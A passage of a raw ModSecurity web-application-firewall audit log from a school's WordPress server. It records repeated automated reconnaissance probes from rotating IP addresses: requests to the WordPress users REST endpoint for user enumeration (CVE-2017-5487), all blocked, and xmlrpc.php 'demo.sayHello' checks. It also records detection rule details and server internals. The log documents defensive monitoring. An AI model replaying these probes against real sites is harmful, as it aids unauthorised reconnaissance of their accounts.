https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f51dd1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459344446472 5438 (- - -) Stopwatch2: 1746459344446472 5438; combined=4120, p1=531, p2=3364, p3=36, p4=35, p5=91, sr=81, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f51dd1e-Z-- --21c55e12-A-- [05/May/2025:22:36:12 +0700] aBja7PZJDMuQndL03JNV_QAAAFg 103.236.140.4 55214 103.236.140.4 8181 --21c55e12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --21c55e12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21c55e12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459372546159 2933 (- - -) Stopwatch2: 1746459372546159 2933; combined=1319, p1=476, p2=815, p3=0, p4=0, p5=28, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21c55e12-Z-- --a7549d56-A-- [05/May/2025:22:36:15 +0700] aBja7_ZJDMuQndL03JNWBAAAAFc 103.236.140.4 55238 103.236.140.4 8181 --a7549d56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7549d56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7549d56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459375193831 2822 (- - -) Stopwatch2: 1746459375193831 2822; combined=1243, p1=441, p2=772, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7549d56-Z-- --e00bb17a-A-- [05/May/2025:22:36:15 +0700] aBja74ZWvR7-42f6JrAHNAAAAMw 103.236.140.4 55244 103.236.140.4 8181 --e00bb17a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e00bb17a-C-- demo.sayHello --e00bb17a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e00bb17a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459375625942 6153 (- - -) Stopwatch2: 1746459375625942 6153; combined=4451, p1=531, p2=3673, p3=50, p4=41, p5=92, sr=83, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e00bb17a-Z-- --60976465-A-- [05/May/2025:22:36:18 +0700] aBja8fZJDMuQndL03JNWDAAAAFE 103.236.140.4 55270 103.236.140.4 8181 --60976465-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --60976465-C-- demo.sayHello --60976465-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --60976465-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459377999488 5861 (- - -) Stopwatch2: 1746459377999488 5861; combined=4600, p1=584, p2=3786, p3=38, p4=42, p5=90, sr=70, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60976465-Z-- --0ce2513e-A-- [05/May/2025:22:37:06 +0700] aBjbIvZJDMuQndL03JNWKwAAAFc 103.236.140.4 55662 103.236.140.4 8181 --0ce2513e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ce2513e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ce2513e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459426116147 3351 (- - -) Stopwatch2: 1746459426116147 3351; combined=1462, p1=477, p2=954, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ce2513e-Z-- --9bb3f177-A-- [05/May/2025:22:37:08 +0700] aBjbJIZWvR7-42f6JrAHRAAAAMI 103.236.140.4 55682 103.236.140.4 8181 --9bb3f177-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9bb3f177-C-- demo.sayHello --9bb3f177-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bb3f177-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459428866826 19188 (- - -) Stopwatch2: 1746459428866826 19188; combined=30222, p1=731, p2=3915, p3=38, p4=44, p5=12762, sr=131, sw=70, l=0, gc=12662 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bb3f177-Z-- --68d26f66-A-- [05/May/2025:22:37:39 +0700] aBjbQ02V_h1VFAgsfgZ3lwAAABg 103.236.140.4 55930 103.236.140.4 8181 --68d26f66-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68d26f66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d26f66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459459972607 2736 (- - -) Stopwatch2: 1746459459972607 2736; combined=1264, p1=403, p2=825, p3=0, p4=0, p5=35, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d26f66-Z-- --fdd3c25f-A-- [05/May/2025:22:37:42 +0700] aBjbRvZJDMuQndL03JNWPAAAAFI 103.236.140.4 55954 103.236.140.4 8181 --fdd3c25f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fdd3c25f-C-- demo.sayHello --fdd3c25f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdd3c25f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459462709226 6620 (- - -) Stopwatch2: 1746459462709226 6620; combined=4857, p1=628, p2=3952, p3=45, p4=44, p5=110, sr=78, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdd3c25f-Z-- --0ec15b76-A-- [05/May/2025:22:37:44 +0700] aBjbSARwKNFSM6B7_LabswAAAJA 103.236.140.4 55976 103.236.140.4 8181 --0ec15b76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ec15b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ec15b76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459464336206 3154 (- - -) Stopwatch2: 1746459464336206 3154; combined=1509, p1=477, p2=1000, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ec15b76-Z-- --e701790c-A-- [05/May/2025:22:37:47 +0700] aBjbSwRwKNFSM6B7_LabtwAAAIQ 103.236.140.4 56002 103.236.140.4 8181 --e701790c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e701790c-C-- demo.sayHello --e701790c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e701790c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459467670765 4840 (- - -) Stopwatch2: 1746459467670765 4840; combined=3811, p1=503, p2=3002, p3=25, p4=27, p5=141, sr=68, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e701790c-Z-- --8259d311-A-- [05/May/2025:22:38:14 +0700] aBjbZvZJDMuQndL03JNWSgAAAEo 103.236.140.4 56254 103.236.140.4 8181 --8259d311-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8259d311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8259d311-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459494200793 2552 (- - -) Stopwatch2: 1746459494200793 2552; combined=1247, p1=407, p2=811, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8259d311-Z-- --b467e441-A-- [05/May/2025:22:38:16 +0700] aBjbaARwKNFSM6B7_LabygAAAIY 103.236.140.4 56274 103.236.140.4 8181 --b467e441-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b467e441-C-- demo.sayHello --b467e441-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b467e441-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459496936905 6797 (- - -) Stopwatch2: 1746459496936905 6797; combined=4988, p1=632, p2=4106, p3=40, p4=45, p5=99, sr=97, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b467e441-Z-- --8530815a-A-- [05/May/2025:22:38:26 +0700] aBjbcgRwKNFSM6B7_LabzAAAAI0 103.236.140.4 56374 103.236.140.4 8181 --8530815a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8530815a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8530815a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459506126968 3427 (- - -) Stopwatch2: 1746459506126968 3427; combined=1488, p1=500, p2=951, p3=0, p4=0, p5=37, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8530815a-Z-- --93c72418-A-- [05/May/2025:22:38:29 +0700] aBjbdU2V_h1VFAgsfgZ3wgAAAAU 103.236.140.4 56410 103.236.140.4 8181 --93c72418-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --93c72418-C-- demo.sayHello --93c72418-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --93c72418-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459509589204 5278 (- - -) Stopwatch2: 1746459509589204 5278; combined=4203, p1=500, p2=3484, p3=32, p4=34, p5=91, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93c72418-Z-- --cf4cd676-A-- [05/May/2025:22:38:32 +0700] aBjbeARwKNFSM6B7_LabzgAAAIo 103.236.140.4 56442 103.236.140.4 8181 --cf4cd676-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cf4cd676-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf4cd676-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459512646948 2911 (- - -) Stopwatch2: 1746459512646948 2911; combined=1478, p1=487, p2=959, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf4cd676-Z-- --3d0b1813-A-- [05/May/2025:22:38:35 +0700] aBjbe_ZJDMuQndL03JNWVQAAAFA 103.236.140.4 56466 103.236.140.4 8181 --3d0b1813-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d0b1813-C-- demo.sayHello --3d0b1813-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d0b1813-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459515452547 5838 (- - -) Stopwatch2: 1746459515452547 5838; combined=4050, p1=572, p2=3264, p3=33, p4=38, p5=84, sr=110, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d0b1813-Z-- --18981652-A-- [05/May/2025:22:38:35 +0700] aBjbe4ZWvR7-42f6JrAHfQAAANc 103.236.140.4 56468 103.236.140.4 8181 --18981652-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id 